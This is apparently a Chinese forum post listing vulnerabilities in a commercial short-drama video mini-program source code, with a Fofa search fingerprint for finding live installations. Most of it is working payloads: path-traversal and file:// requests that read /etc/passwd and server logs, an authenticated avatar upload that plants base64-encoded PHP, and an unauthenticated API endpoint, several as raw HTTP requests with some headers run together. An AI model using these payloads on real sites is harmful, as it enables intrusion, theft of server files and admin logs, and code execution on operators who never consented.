2024年最新新版小剧场短剧影视小程序源码+风口项目 ,短剧APP 小程序源码 风口项目 ,短剧app 小程序 H5 多端程序 对接了易支付,修复了众多BUG 目前已知BUG全部修复,看了下没有uniapp只有编译后的,用户量还挺大的.
Fofa:
"/VwmRIfEYDH.php"
前台Lang文件读取漏洞
Payload:
/index/ajax/lang?lang=../../application/database
前台任意文件读取漏洞
Payload:
GET /api/ems/juhecurl?url=file:///etc/passwd HTTP/1.1
Host:
Cache-Control: max-age=0Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.
9Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9Connection: closeh-
前台任意文件上传漏洞
这里需要登录,普通用户权限即可 访问 /index/user 可直接注册登录.
Payload:
POST /api/user/avatar HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-aliveContent-Length: 73Content-Type:
application/x-www-form-urlencoded
Cookie: PHPSESSID=qt0rrvopobbbvibu6f8p9lr42r
Host: 127.0.0.1O
rigin: http://127.0.0.1
Referer: http://127.0.0.1/api/user/avatar
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
base64=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==
前台未授权访问漏洞
Payload:
/api/index
任意文件读取+Log日志泄露组合拳
这套系统开了Debug,同时也开了日志记录,也就是说在 /runtime/log/ 目录下会实时生成日志,包括管理员的访问日志也在其中,正常来说网站是绑定在Public目录下的,咱们无法读取,但可以通过任意文件读取漏洞来跨目录读取这些日志.
Payload:
/api/ems/juhecurl?url=file:///D:/phpstudy_pro/WWW/runtime/log/202409/07.log
没有回复内容